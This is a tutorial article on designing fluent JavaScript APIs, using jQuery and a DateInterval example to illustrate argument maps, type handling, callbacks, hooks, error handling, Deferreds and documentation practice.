    How your methods accept data is more important than making them chainable. While method chaining is a pretty generic thing that you can easily make your code do, handling arguments is not. You’ll need to think about how the methods you provide are most likely going to be used. Is code that uses your API likely to repeat certain function calls? Why are these calls repeated? How could your API help the developer to reduce the noise of repeating method calls?

    jQuery’s css() method can set styles on a DOM element:

    jQuery("#some-selector")
      .css("background", "red")
      .css("color", "white")
      .css("font-weight", "bold")
      .css("padding", 10);

    There’s a pattern here! Every method invocation is naming a style and specifying a value for it. This calls for having the method accept a map:

      "background" : "red",
      "color" : "white",
      "font-weight" : "bold",
      "padding" : 10

    jQuery’s on() method can register event handlers. Like css() it accepts a map of events, but takes things even further by allowing a single handler to be registered for multiple events:

    // binding events by passing a map
    jQuery("#some-selector").on({
      "click" : myClickHandler,
      "keyup" : myKeyupHandler,
      "change" : myChangeHandler
    });

    // binding a handler to multiple events:
    jQuery("#some-selector").on("click keyup change", myEventHandler);

    You can offer the above function signatures by using the following method pattern:

    DateInterval.prototype.values = function(name, value) {
      var map, keys;
      if (jQuery.isPlainObject(name)) {
        // setting a map
        map = name;
      } else if (value !== undefined) {
        // setting a value (on possibly multiple names), convert to map
        keys = name.split(" ");
        map = {};
        for (var i = 0, length = keys.length; i < length; i++) {
          map[keys[i]] = value;
        }
      } else if (name === undefined) {
        // getting all values (this.data is the instance's value store)
        return this.data;
      } else {
        // getting specific value
        return this.data[name];
      }

      for (var key in map) {
        this.data[key] = map[key];
      }

      return this;
    };
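    To see this pattern from the caller’s side, here is a self-contained sketch. Settings is a made-up type, with a plain-object check standing in for jQuery.isPlainObject:

```javascript
function Settings() {
  this.data = {}; // internal value store
}

Settings.prototype.values = function(name, value) {
  var map, keys, i;
  if (typeof name === "object" && name !== null) {
    map = name;                 // setting a map
  } else if (value !== undefined) {
    keys = name.split(" ");     // setting one value on several names
    map = {};
    for (i = 0; i < keys.length; i++) {
      map[keys[i]] = value;
    }
  } else if (name === undefined) {
    return this.data;           // getting all values
  } else {
    return this.data[name];     // getting one value
  }
  for (var key in map) {
    this.data[key] = map[key];
  }
  return this;                  // commands remain chainable
};

var s = new Settings();
s.values("color", "red")        // single name
 .values("width height", 100)   // several names at once
 .values({ depth: 2 });         // a map
```

    One method covers five call styles: set one name, set several names, set a map, query one name, and query everything.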

    If you are working with collections, think about what you can do to reduce the number of loops an API user would probably have to make. Say we had a number of <input> elements for which we want to set the default value:

    <input type="text" value="" data-default="foo">
    <input type="text" value="" data-default="bar">
    <input type="text" value="" data-default="baz">

    We’d probably go about this with a loop:

    jQuery("input").each(function() {
      var $this = jQuery(this);
      $this.val($this.data("default"));
    });
    What if we could bypass that method with a simple callback that gets applied to each <input> in the collection? jQuery developers have thought of that and allow us to write less™:

    jQuery("input").val(function() {
      return jQuery(this).data("default");
    });

    It’s the little things like accepting maps, callbacks or serialized attribute names, that make using your API not only cleaner, but more comfortable and efficient to use. Obviously not all of your APIs’ methods will benefit from this method pattern — it’s up to you to decide where all this makes sense and where it is just a waste of time. Try to be as consistent about this as humanly possible. Reduce the need for boilerplate code with the tricks shown above and people will invite you over for a drink.

    Handling Types

    Whenever you define a function that will accept arguments, you decide what data that function accepts. A function to calculate the number of days between two dates could look like:

    DateInterval.prototype.days = function(start, end) {
      return Math.floor((end - start) / 86400000);
    };

    As you can see, the function expects numeric input — a millisecond timestamp, to be exact. While the function does what we intended it to do, it is not very versatile. What if we’re working with Date objects or a string representation of a date? Is the user of this function supposed to cast data all the time? No! Simply verifying the input and casting it to whatever we need it to be should be done in a central place, not cluttered throughout the code using our API:

    DateInterval.prototype.days = function(start, end) {
      if (!(start instanceof Date)) {
        start = new Date(start);
      }
      if (!(end instanceof Date)) {
        end = new Date(end);
      }
      return Math.floor((end.getTime() - start.getTime()) / 86400000);
    };

    By adding these six lines we’ve given the function the power to accept a Date object, a numeric timestamp, or even a string representation like Sat Sep 08 2012 15:34:35 GMT+0200 (CEST). We do not know how and for what people are going to use our code, but with a little foresight, we can make sure there is little pain with integrating our code.

    The experienced developer can spot another problem in the example code. We’re assuming start comes before end. If the API user accidentally swapped the dates, he’d be given a negative value for the number of days between start and end. Stop and think about these situations carefully. If you’ve come to the conclusion that a negative value doesn’t make sense, fix it:

    DateInterval.prototype.days = function(start, end) {
      if (!(start instanceof Date)) {
        start = new Date(start);
      }
      if (!(end instanceof Date)) {
        end = new Date(end);
      }
      return Math.abs(Math.floor((end.getTime() - start.getTime()) / 86400000));
    };

    JavaScript allows type casting in a number of ways. If you’re dealing with primitives (string, number, boolean), it can get as simple (as in “short”) as:

    function castaway(some_string, some_integer, some_boolean) {
      some_string += "";
      some_integer += 0; // parseInt(some_integer, 10) is the safer bet
      some_boolean = !!some_boolean;
    }

    I’m not advocating that you do this everywhere and at all times. But these innocent-looking lines may save time and some suffering while integrating your code.

    Treating undefined as an Expected Value

    There will come a time when undefined is a value that your API actually expects to be given for setting an attribute. This might happen to “unset” an attribute, or simply to gracefully handle bad input, making your API more robust. To identify whether the value undefined has actually been passed to your method, you can check the arguments object:

    function testUndefined(expecting, someArgument) {
      if (someArgument === undefined) {
        console.log("someArgument was undefined");
      }
      if (arguments.length > 1) {
        console.log("but was actually passed in");
      }
    }

    testUndefined("foo");
    // prints: someArgument was undefined
    testUndefined("foo", undefined);
    // prints: someArgument was undefined, but was actually passed in

    Named Arguments

    event.initMouseEvent(
      "click", true, true, window,
      123, 101, 202, 101, 202,
      true, false, false, false,
      1, null);

    The function signature of Event.initMouseEvent is a nightmare come true. There is no chance any developer will remember what that 1 (second to last parameter) means without looking it up in the documentation. No matter how good your documentation is, do what you can so people don’t have to look things up!

    How Others Do It

    Looking beyond our beloved language, we find that Python knows a concept called named arguments. It allows you to declare a function with default values for its arguments, and to name those arguments in the calling context:

    function namesAreAwesome(foo=1, bar=2) {
      console.log(foo, bar);
    }

    namesAreAwesome();
    // prints: 1, 2

    namesAreAwesome(3, 4);
    // prints: 3, 4

    namesAreAwesome(foo=5, bar=6);
    // prints: 5, 6

    namesAreAwesome(bar=6);
    // prints: 1, 6

    Given this scheme, initMouseEvent() could’ve looked like a self-explaining function call:

    event.initMouseEvent(
      type="click",
      canBubble=true,
      cancelable=true,
      view=window,
      detail=123,
      screenX=101,
      screenY=202,
      clientX=101,
      clientY=202,
      ctrlKey=true,
      altKey=false,
      shiftKey=false,
      metaKey=false,
      button=1,
      relatedTarget=null);
    In JavaScript, this is not possible today. While “the next version of JavaScript” (frequently called ES6 or Harmony) will have default parameter values and rest parameters, there is still no sign of named parameters.
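For illustration, here is what the proposed ES6 default parameter values look like; this is upcoming syntax, so engine support will vary, and named parameters remain unavailable:

```javascript
// ES6 default parameter values: defaults apply when an argument is omitted
function namesAreAwesome(foo = 1, bar = 2) {
  return [foo, bar];
}

console.log(namesAreAwesome());     // [1, 2]
console.log(namesAreAwesome(3, 4)); // [3, 4]
```

Note that, unlike in Python, writing namesAreAwesome(bar=6) would not set a named parameter; defaults only fill in omitted trailing arguments.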

    Argument Maps

    JavaScript not being Python (and being light years away from it), we’re left with fewer choices for overcoming the obstacle of “argument forests”. jQuery (and pretty much every other decent API out there) chose to work with the concept of “option objects”. The signature of jQuery.ajax() provides a pretty good example. Instead of accepting numerous arguments, we accept just one object:

    function nightmare(accepts, async, beforeSend, cache, complete, /* and 28 more */) {
      if (accepts === "text") {
        // prepare for receiving plain text
      }
    }

    function dream(options) {
      options = options || {};
      if (options.accepts === "text") {
        // prepare for receiving plain text
      }
    }

    Not only does this prevent insanely long function signatures, it also makes calling the function more descriptive:

    nightmare("text", true, undefined, false, undefined, /* and 28 more */);

    dream({
      accepts: "text",
      async: true,
      cache: false
    });

    Also, we do not have to touch the function signature (adding a new argument) should we introduce a new feature in a later version.

    Default Argument Values

    jQuery.extend(), _.extend() and Prototype’s Object.extend are functions that let you merge objects, allowing you to throw your own preset options object into the mix:

    var default_options = {
      accepts: "text",
      async: true,
      beforeSend: null,
      cache: false,
      complete: null,
      // …
    };

    function dream(options) {
      var o = jQuery.extend({}, default_options, options || {});
      console.log(o.accepts);
    }

    // make defaults public
    dream.default_options = default_options;

    dream({ async: false });
    // prints: "text"
    // prints: "text"

    You earn bonus points for making the default values publicly accessible. With this, anyone can change accepts to “json” in a central place and thus avoid specifying that option over and over again. Note that the example always appends || {} to the initial read of the options object, which allows you to call the function without any argument.
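If you'd rather not depend on a library for the merge, the same pattern can be sketched with Object.assign (available in ES2015 and later); dream and default_options below mirror the hypothetical names used above:

```javascript
var default_options = {
  accepts: "text",
  async: true,
  cache: false
};

function dream(options) {
  // merge defaults and the caller's options into a fresh object;
  // `|| {}` lets callers omit the argument entirely
  return Object.assign({}, dream.default_options, options || {});
}

// make defaults public so they can be tweaked in one central place
dream.default_options = default_options;

dream.default_options.accepts = "json";
console.log(dream().accepts);               // prints: json
console.log(dream({ async: false }).async); // prints: false
```

Because Object.assign copies left to right, later objects win, so caller-supplied options override the published defaults.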

    Good Intentions — a.k.a. “Pitfalls”

    Now that you know how to be truly flexible in accepting arguments, we need to come back to an old saying:

    “With great power comes great responsibility!”
    — Voltaire

    As with most weakly-typed languages, JavaScript casts automatically when it needs to. A simple example is testing truthiness:

    var foo = 1;
    var bar = true;

    if (foo) {
      // yep, this will execute
    }

    if (bar) {
      // yep, this will execute
    }

    We’re quite used to this automatic casting. We’re so used to it that we forget that although something is truthy, it may not be the boolean true. Some APIs are so flexible that they are too smart for their own good. Take a look at the signatures of jQuery.toggle():

    .toggle( /* int */ [duration] [, /* function */  callback] )
    .toggle( /* int */ [duration] [, /* string */  easing] [, /* function */ callback] )
    .toggle( /* bool */ showOrHide )

    It will take us some time to decrypt why these two behave entirely differently:

    var foo = 1;
    var bar = true;

    var $hello = jQuery(".hello");
    var $world = jQuery(".world");

    $hello.toggle(foo);
    $world.toggle(bar);

    We were expecting to use the showOrHide signature in both cases. But what really happened is that $hello did a toggle with a duration of one millisecond. This is not a bug in jQuery; it is simply a case of expectations not being met. Even if you’re an experienced jQuery developer, you will trip over this from time to time.

    You are free to add as much convenience/sugar as you like, but do not sacrifice a clean and (mostly) robust API along the way. If you find yourself providing something like this, think about offering a separate method like .toggleIf(bool) instead. Whatever choice you make, keep your API consistent!
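A sketch of what such a separate, strictly boolean method could look like; Widget and its internals here are hypothetical stand-ins for illustration, not jQuery's API:

```javascript
function Widget() {
  this.visible = false;
}

// the flexible, overloaded toggle stays available…
Widget.prototype.toggle = function() {
  this.visible = !this.visible;
  return this;
};

// …while toggleIf() accepts only a boolean and rejects everything else
Widget.prototype.toggleIf = function(showOrHide) {
  if (typeof showOrHide !== "boolean") {
    throw new TypeError("toggleIf() expects a boolean");
  }
  this.visible = showOrHide;
  return this;
};

var w = new Widget();
w.toggleIf(true); // explicitly show, no guessing about durations
console.log(w.visible); // prints: true
```

Callers who accidentally pass a truthy non-boolean (like the 1 from the example above) get an immediate, descriptive error instead of surprising behavior.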


    Developing Possibilities

    With option objects, we’ve covered the topic of extensible configuration. Let’s talk about allowing the API user to extend the core and the API itself. This is an important topic, as it allows your code to focus on the important things while having API users implement edge cases themselves. Good APIs are concise APIs. Having a handful of configuration options is fine, but having a couple dozen of them makes your API feel bloated and opaque. Focus on the primary use cases; only do the things most of your API users will need. Everything else should be left up to them. To allow API users to extend your code to suit their needs, you have a couple of options…


    Callbacks

    Callbacks can be used to achieve extensibility by configuration. You can use callbacks to allow the API user to override certain parts of your code. When you feel that specific tasks may be handled differently than your default code does, refactor that code into a configurable callback function so that an API user can easily override it:

    var default_options = {
      // ...
      position: function($elem, $parent) {
        $elem.css($parent.position());
      }
    };

    function Widget(options) {
      this.options = jQuery.extend({}, default_options, options || {});
    }

    Widget.prototype.create = function() {
      this.$container = $("<div></div>").appendTo(document.body);
      this.$thingie = $("<div></div>").appendTo(this.$container);
      return this;
    };

    Widget.prototype.show = function() {
      this.options.position(this.$thingie, this.$container);
      return this;
    };

    var widget = new Widget({
      position: function($elem, $parent) {
        var position = $parent.position();
        // position $elem at the lower right corner of $parent
        position.left += $parent.width();
        position.top += $parent.height();
        $elem.css(position);
      }
    });
    widget.show();

    Callbacks are also a generic way to allow API users to customize elements your code has created:

    // default create callback doesn't do anything
    default_options.create = function($thingie){};

    Widget.prototype.create = function() {
      this.$container = $("<div></div>").appendTo(document.body);
      this.$thingie = $("<div></div>").appendTo(this.$container);
      // execute create callback to allow decoration
      this.options.create(this.$thingie);
      return this;
    };

    var widget = new Widget({
      create: function($elem) {
        $elem.addClass("my-widget-style");
      }
    });

    Whenever you accept callbacks, be sure to document their signatures and provide examples to help API users customize your code. Make sure you’re consistent about the context (what this points to) in which callbacks are executed, and about the arguments they accept.
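One way to stay consistent is to always invoke callbacks through call() with a documented context and argument list. A minimal dependency-free sketch (Widget and the create option are hypothetical illustrations, not a real library's API):

```javascript
function Widget(options) {
  this.options = options || {};
}

Widget.prototype.create = function() {
  this.element = { tagName: "DIV", className: "" };
  if (typeof this.options.create === "function") {
    // documented contract: `this` is the widget instance,
    // the only argument is the freshly created element
    this.options.create.call(this, this.element);
  }
  return this;
};

var widget = new Widget({
  create: function(elem) {
    // decorate the element the widget just created
    elem.className = "fancy";
  }
}).create();

console.log(widget.element.className); // prints: fancy
```

Because the contract is stated once and enforced via call(), every callback your API ever fires behaves the same way, which is exactly what keeps users from guessing.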


    Events

    Events come naturally when working with the DOM. In larger applications we use events in various forms (e.g. PubSub) to enable communication between modules. Events are particularly useful and feel most natural when dealing with UI widgets. Libraries like jQuery offer simple interfaces that allow you to easily conquer this domain.

    Events interface best when there is something happening — hence the name. Showing and hiding a widget could depend on circumstances outside of your scope. Updating the widget when it’s shown is also a very common thing to do. Both can be achieved quite easily using jQuery’s event interface, which even allows for the use of delegated events:

    Widget.prototype.show = function() {
      var event = jQuery.Event("widget:show");
      this.$container.trigger(event);
      if (event.isDefaultPrevented()) {
        // event handler prevents us from showing
        return this;
      }

      this.options.position(this.$thingie, this.$container);
      return this;
    };

    // listen for all widget:show events
    $(document.body).on('widget:show', function(event) {
      if (Math.random() > 0.5) {
        // prevent widget from showing
        event.preventDefault();
      }

      // update widget's data
      $(this).data("last-show", new Date());
    });

    var widget = new Widget();
    widget.show();

    You can freely choose event names. Avoid using native event names for proprietary things and consider namespacing your events. jQuery UI’s event names are composed of the widget’s name and the event name, e.g. dialogshow. I find that hard to read and often default to dialog:show, mainly because it is immediately clear that this is a custom event, rather than something some browser might have secretly implemented.


    Hooks

    Traditional getter and setter methods can especially benefit from hooks. Hooks usually differ from callbacks in their number and how they’re registered. Where callbacks are usually used on an instance level for a specific task, hooks are usually used on a global level to customize values or dispatch custom actions. To illustrate how hooks can be used, let’s take a peek at jQuery’s cssHooks:

    // define a custom css hook
    jQuery.cssHooks.custombox = {
      get: function(elem, computed, extra) {
        return $.css(elem, 'borderRadius') == "50%"
          ? "circle"
          : "box";
      },
      set: function(elem, value) {
        elem.style.borderRadius = value == "circle"
          ? "50%"
          : "0";
      }
    };

    // have .css() use that hook
    $("#some-selector").css("custombox", "circle");

    By registering the hook custombox we’ve given jQuery’s .css() method the ability to handle a CSS property it previously couldn’t. In my article jQuery hooks, I explain the other hooks that jQuery provides and how they can be used in the field. You can provide hooks much like you would handle callbacks:

    DateInterval.nameHooks = {
      "yesterday" : function() {
        var d = new Date();
        d.setTime(d.getTime() - 86400000);
        return d;
      }
    };

    DateInterval.prototype.start = function(date) {
      if (date === undefined) {
        return new Date(this.startDate.getTime());
      }

      if (typeof date === "string" && DateInterval.nameHooks[date]) {
        date = DateInterval.nameHooks[date]();
      }

      if (!(date instanceof Date)) {
        date = new Date(date);
      }

      this.startDate.setTime(date.getTime());
      return this;
    };

    var di = new DateInterval();
    di.start("yesterday");

    In a way, hooks are a collection of callbacks designed to handle custom values within your own code. With hooks you can stay in control of almost everything, while still giving API users the option to customize.

    Generating Accessors


    Any API is likely to have multiple accessor methods (getters, setters, executors) doing similar work. Coming back to our DateInterval example, we’re most likely providing start() and end() to allow manipulation of intervals. A simple solution could look like this:

    DateInterval.prototype.start = function(date) {
      if (date === undefined) {
        return new Date(this.startDate.getTime());
      }
      this.startDate.setTime(date.getTime());
      return this;
    };

    DateInterval.prototype.end = function(date) {
      if (date === undefined) {
        return new Date(this.endDate.getTime());
      }
      this.endDate.setTime(date.getTime());
      return this;
    };

    As you can see, we have a lot of repeated code. A DRY (Don’t Repeat Yourself) solution might use this generator pattern:

    var accessors = ["start", "end"];
    for (var i = 0, length = accessors.length; i < length; i++) {
      var key = accessors[i];
      DateInterval.prototype[key] = generateAccessor(key);
    }

    function generateAccessor(key) {
      var value = key + "Date";
      return function(date) {
        if (date === undefined) {
          return new Date(this[value].getTime());
        }
        this[value].setTime(date.getTime());
        return this;
      };
    }

    This approach allows you to generate multiple similar accessor methods, rather than defining every method separately. If your accessor methods require more data to set up than just a simple string, consider something along the lines of:

    var accessors = {"start" : {color: "green"}, "end" : {color: "red"}};
    for (var key in accessors) {
      DateInterval.prototype[key] = generateAccessor(key, accessors[key]);
    }

    function generateAccessor(key, accessor) {
      var value = key + "Date";
      return function(date) {
        // setting something up
        // using `key` and `accessor.color`
      };
    }

    In the chapter Handling Arguments we talked about a method pattern to allow your getters and setters to accept various useful types like maps and arrays. The method pattern itself is a pretty generic thing and could easily be turned into a generator:

    function wrapFlexibleAccessor(get, set) {
      return function(name, value) {
        var map;
        if (jQuery.isPlainObject(name)) {
          // setting a map
          map = name;
        } else if (value !== undefined) {
          // setting a value (on possibly multiple names), convert to map
          var keys = name.split(" ");
          map = {};
          for (var i = 0, length = keys.length; i < length; i++) {
            map[keys[i]] = value;
          }
        } else {
          return get.call(this, name);
        }

        for (var key in map) {
          set.call(this, key, map[key]);
        }

        return this;
      };
    }

    DateInterval.prototype.values = wrapFlexibleAccessor(
      function(name) {
        return name !== undefined
          ? this._values[name]
          : this._values;
      },
      function(name, value) {
        this._values[name] = value;
      }
    );

    Digging into the art of writing DRY code is well beyond this article. Rebecca Murphey’s Patterns for DRY-er JavaScript and Mathias Bynens’ slide deck on how DRY impacts JavaScript performance are a good start if you’re new to the topic.

    The Reference Horror

    Unlike some other languages, JavaScript doesn’t let you choose between pass by reference and pass by value. Passing data by value is the safe option: it makes sure that data passed to your API, and data returned from it, may be modified outside of your API without altering the state within. Passing data by reference is often used to keep memory overhead low, but values passed by reference can be changed anywhere outside your API and affect the state within.

    In JavaScript there is no way to tell whether arguments should be passed by reference or by value. Primitives (strings, numbers, booleans) are treated as pass by value, while objects (any object, including Array and Date) are handled in a way that’s comparable to pass by reference. If this is the first time you’re hearing about this topic, let the following example enlighten you:

    // by value
    function addOne(num) {
      num = num + 1; // yes, num++; does the same
      return num;
    var x = 0;
    var y = addOne(x);
    // x === 0 <--
    // y === 1
    // by reference
    function addOne(obj) {
      obj.num = obj.num + 1;
      return obj;
    var ox = {num : 0};
    var oy = addOne(ox);
    // ox.num === 1 <--
    // oy.num === 1

    The by reference handling of objects can come back and bite you if you’re not careful. Going back to the DateInterval example, check out this bugger:

    var startDate = new Date(2012, 0, 1);
    var endDate = new Date(2012, 11, 31);
    var interval = new DateInterval(startDate, endDate);
    endDate.setMonth(0); // set to january
    var days = interval.days(); // got 31 but expected 365 - ouch!

    Unless the constructor of DateInterval made a copy (clone is the technical term for a copy) of the values it received, any changes to the original objects will reflect on the internals of DateInterval. This is usually not what we want or expect.
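A sketch of how such a constructor could defensively clone its Date arguments; DateInterval's internals are assumed here for illustration, since the article never shows them:

```javascript
function DateInterval(start, end) {
  // clone the incoming Dates so that mutating the originals
  // can no longer corrupt our internal state
  this.startDate = new Date(start.getTime());
  this.endDate = new Date(end.getTime());
}

DateInterval.prototype.days = function() {
  // 86400000 ms per day; rounding absorbs potential DST shifts
  return Math.round((this.endDate - this.startDate) / 86400000);
};

var startDate = new Date(2012, 0, 1);
var endDate = new Date(2012, 11, 31);
var interval = new DateInterval(startDate, endDate);
endDate.setMonth(0); // mutating the original has no effect anymore
console.log(interval.days()); // prints: 365
```

Two lines of cloning in the constructor are all it takes to turn the "got 31 but expected 365" surprise into the behavior callers actually expect.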

    Note that the same is true for values returned from your API. If you simply return an internal object, any changes made to it outside of your API will be reflected in your internal data. This is most certainly not what you want. jQuery.extend(), _.extend() and Prototype’s Object.extend allow you to easily escape the reference horror.

    If this summary did not suffice, read the excellent chapter By Value Versus by Reference from O’Reilly’s JavaScript – The Definitive Guide.

    The Continuation Problem

    In a fluent interface, all methods of a chain are executed, regardless of the state that the base object is in. Consider calling a few methods on a jQuery instance that contains no DOM elements:

    jQuery('.wont-find-anything')
      // executed although there is nothing to execute against
      .somePlugin()
      .someOtherPlugin();

    In non-fluent code we could have prevented those functions from being executed:

    var $elem = jQuery('.wont-find-anything');
    if ($elem.length) {
      $elem.somePlugin().someOtherPlugin();
    }

    Whenever we chain methods, we lose the ability to prevent certain things from happening — we can’t escape from the chain. As long as the API developer knows that objects can have a state where methods don’t actually do anything but return this;, everything is fine. Depending on what your methods do internally, it may help to prepend a trivial is-empty detection:

    jQuery.fn.somePlugin = function() {
      if (!this.length) {
        // "abort" since we've got nothing to work with
        return this;
      }

      // do some computationally heavy setup tasks
      for (var i = 10000; i > 0; i--) {
        // I'm just wasting your precious CPU!
        // If you call me often enough, I'll turn
        // your laptop into a rock-melting jet engine
      }

      return this.each(function() {
        // do the actual job
      });
    };

    Handling Errors

    Fail Faster

    I was lying when I said we couldn’t escape from the chain — there is an Exception to the rule (pardon the pun ☺).

    We can always eject by throwing an Error (exception). Throwing an Error is considered a deliberate abort of the current flow, most likely because you got into a state you couldn’t recover from. But beware — not all Errors help the debugging developer:

    // jQuery accepts this
    $(document.body).on('click', {});
    // on click the console screams
    //   TypeError: ((p.event.special[l.origType] || {}).handle || l.handler).apply is not a function 
    //   in jQuery.min.js on Line 3

    Errors like these are a major pain to debug. Don’t waste other people’s time. Inform API users when they have done something wrong:

    if (Object.prototype.toString.call(callback) !== '[object Function]') { // see note
      throw new TypeError("callback is not a function!");
    }

    Note: typeof callback === "function" should not be used, as older browsers may report objects to be a function, which they are not. In Chrome (up to version 12) RegExp is such a case. For convenience, use jQuery.isFunction() or _.isFunction().

    Most libraries that I have come across, regardless of language (within the weak-typing domain), don’t care about rigorous input validation. To be honest, my own code only validates where I anticipate developers stumbling. Nobody really does it, but all of us should. Programmers are a lazy bunch — we don’t write code just for the sake of writing code, or for some cause we don’t truly believe in. The developers of Perl6 have recognized this as a problem and decided to incorporate something called Parameter Constraints. In JavaScript, their approach might look something like this:

    function validateAllTheThings(a, b {where typeof b === "numeric" and b < 10}) {
      // Interpreter should throw an Error if b is
      // not a number or greater than 9

    While the syntax is as ugly as it gets, the idea is to make validation of input a first-class citizen of the language. JavaScript is nowhere near being something like that. That’s fine — I couldn’t see myself cramming these constraints into the function signature anyway. It’s admitting the problem (of weakly-typed languages) that is the interesting part of this story.

    JavaScript is neither weak nor inferior; we just have to work a bit harder to make our stuff really robust. Making code robust does not mean accepting any data, waving your wand and getting some result. Being robust means not accepting rubbish and telling the developer about it.

    Think of input validation this way: a couple of lines of code behind your API can make sure that no developer has to spend hours chasing down weird bugs because they accidentally gave your code a string instead of a number. This is the one time you can tell people they’re wrong and they’ll actually love you for it.
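Such checks can be captured once in a tiny helper. assertType and its messages below are made-up names, a sketch rather than any library's API; it reuses the Object.prototype.toString technique from the note above:

```javascript
function assertType(value, expected, name) {
  // derive "number", "string", "function", … from the internal [[Class]]
  var actual = Object.prototype.toString.call(value).slice(8, -1).toLowerCase();
  if (actual !== expected) {
    throw new TypeError(name + " must be a " + expected + ", got " + actual);
  }
}

function setDuration(duration) {
  assertType(duration, "number", "duration");
  return duration * 1000; // safe to do arithmetic now
}

console.log(setDuration(2)); // prints: 2000
// setDuration("2") would throw:
//   TypeError: duration must be a number, got string
```

The error message names the offending parameter and both types, so the developer chasing the bug gets pointed at their own call site instead of at your internals.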

    Going Asynchronous

    So far we’ve only looked at synchronous APIs. Asynchronous methods usually accept a callback function to inform the outside world once a certain task is finished. This doesn’t fit too nicely into our fluent interface scheme, though:

    Api.prototype.async = function(callback) {
      console.log("async()");
      // do something asynchronous
      window.setTimeout(callback, 500);
      return this;
    };

    Api.prototype.method = function() {
      console.log("method()");
      return this;
    };

    // running things
    api.async(function() {
      console.log("callback()");
    }).method();
    // prints: async(), method(), callback()

    This example illustrates how the asynchronous method async() begins its work but returns immediately, leading to method() being invoked before the actual task of async() has completed. There are times when we want this to happen, but generally we expect method() to execute only after async() has completed its job.

    Deferreds (Promises)

    To some extent we can counter the mess that is a mix of asynchronous and synchronous API calls with Promises. jQuery knows them as Deferreds. A Deferred is returned in place of your regular this, which forces you to eject from method chaining. This may seem odd at first, but it effectively prevents you from continuing synchronously after invoking an asynchronous method:

    Api.prototype.async = function() {
      console.log("async()");
      var deferred = $.Deferred();
      window.setTimeout(function() {
        // do something asynchronous
        deferred.resolve("some-data");
      }, 500);
      return deferred.promise();
    };

    api.async().done(function(data) {
      console.log("callback()");
      api.method();
    });
    // prints: async(), callback(), method()

    The Deferred object lets you register handlers using .done(), .fail() and .always(), to be called when the asynchronous task has completed, has failed, or regardless of its state. See Promise Pipelines In JavaScript for a more detailed introduction to Deferreds.
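The same ejection pattern carries over to standard Promises, which later became native to the language; a minimal sketch with made-up task names and timings:

```javascript
function async() {
  return new Promise(function(resolve) {
    setTimeout(function() {
      // do something asynchronous, then hand the result onward
      resolve("some-data");
    }, 50);
  });
}

async().then(function(data) {
  // runs only after the asynchronous work has finished
  console.log("got", data);
});
```

As with a Deferred, returning a Promise instead of this forces the caller out of the synchronous chain, so there is no way to accidentally continue before the work is done.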

    Debugging Fluent Interfaces

    While fluent interfaces are much nicer to develop with, they do come with certain limitations regarding debuggability.

    As with any code, Test Driven Development (TDD) is an easy way to reduce debugging needs. Having written URI.js in TDD, I have not come across major pains regarding debugging my code. However, TDD only reduces the need for debugging — it doesn’t replace it entirely.

    Some voices on the internet suggest writing out each component of a chain on its own line to get proper line numbers for errors in a stack trace:

    foobar.bar()
      .baz()
      .bam()
      .someError();

    This technique does have its benefits (though better debugging is not a solid part of it). Code written like the above example is even simpler to read. Line-based differentials (used in version control systems like SVN and Git) might see a slight win as well. Debugging-wise, it is only Chrome (at the moment) that will show someError() to be on line four, while other browsers treat it as line one.

    Adding a simple method to log your objects can already help a lot — although that is considered “manual debugging” and may be frowned upon by people used to “real” debuggers:

    DateInterval.prototype.explain = function() {
      // log the current state to the console
      console.log(this.startDate, this.endDate);
      return this;
    };

    var days = (new Date(2012, 0, 1))
      .until(2012, 11, 31) // returns DateInterval instance
      .explain() // write some infos to the console
      .days(); // 365

    Function Names

    Throughout this article you’ve seen a lot of demo code in the style of Foo.prototype.something = function(){}. This style was chosen to keep examples brief. When writing APIs you might want to consider either of the following approaches, to have your console properly identify function names:

    Foo.prototype.something = (function something() {
      // yadda yadda
    });

    Foo.prototype.something = function() {
      // yadda yadda
    };
    Foo.prototype.something.displayName = "Foo.something";

    The first approach has its quirks due to hoisting — unless you wrap your declarations in parentheses as the example shows. The second option, displayName, was introduced by WebKit and later adopted by Firebug/Firefox. displayName is a bit more code to write out, but allows arbitrary names, including a namespace or associated object. Either of these approaches can help quite a bit with anonymous functions.

    Read more on this topic in Named function expressions demystified by kangax.

    Documenting APIs

    One of the hardest tasks of software development is documenting things. Practically everyone hates doing it, yet everybody laments bad or missing documentation for the tools they need to use. There is a wide range of tools that supposedly help and automate documenting your code.

    At one point or another, all of these tools will disappoint. JavaScript is a very dynamic language and thus particularly diverse in expression. This makes a lot of things extremely difficult for these tools. The following list features a couple of reasons why I’ve decided to prepare documentation in vanilla HTML, Markdown or DocBook (if the project is large enough). jQuery, for example, has the same issues and doesn’t document its APIs within its code at all.

    1. Function signatures aren’t the only documentation you need, but most tools focus only on them.
    2. Example code goes a long way in explaining how something works. Regular API docs usually fail to illustrate that with a fair trade-off.
    3. API docs usually fail horribly at explaining things behind the scenes (flow, events, etc).
    4. Documenting methods with multiple signatures is usually a real pain.
    5. Documenting methods using option objects is often not a trivial task.
    6. Generated Methods aren’t easily documented, neither are default callbacks.

    If you can’t (or don’t want to) adjust your code to fit one of the listed documentation tools, projects like Document-Bootstrap might save you some time setting up your home-brew documentation.

    Make sure your documentation is more than just some generated API doc. Your users will appreciate any examples you provide. Tell them how your software flows and which events are involved when doing something. Draw them a map if it helps their understanding of whatever it is your software is doing. And above all: keep your docs in sync with your code!

    Self-Explanatory Code

    Providing good documentation will not keep developers from actually reading your code — your code is a piece of documentation itself. Whenever the documentation doesn’t suffice (and every documentation has its limits), developers fall back to reading the actual source to get their questions answered. Actually, you are one of them as well. You are most likely reading your own code again and again, with weeks, months or even years in between.

    You should be writing code that explains itself. Most of the time this is a non-issue, as it only involves you thinking harder about naming things (functions, variables, etc) and sticking to a core concept. If you find yourself writing code comments to document how your code does something, you’re most likely wasting time — your time, and the reader’s as well. Comment on your code to explain why you solved the problem this particular way, rather than explaining how you solved the problem. The how should become apparent through your code, so don’t repeat yourself. Note that using comments to mark sections within your code or to explain general concepts is totally acceptable.
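A contrived sketch of the difference between a comment that repeats the how and one that explains the why:

```javascript
var rows = ["header", "alice", "bob"];

// Wasted comment: repeats *how* (the code already says this)
//   take everything after index 0

// Useful comment: explains *why*
//   the first row is a CSV header; real records start at index 1
var records = rows.slice(1);

console.log(records); // prints: [ 'alice', 'bob' ]
```

The slice itself needs no explanation; the reason for skipping the first element does.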


    Final Words

    • An API is a contract between you (the provider) and the user (the consumer). Don’t just change things between versions.
    • You should invest as much time into the question How will people use my software? as you have put into How does my software work internally?
    • With a couple of simple tricks you can greatly reduce the developer’s efforts (in terms of the lines of code).
    • Handle invalid input as early as possible — throw Errors.
    • Good APIs are flexible, better APIs don’t let you make mistakes.

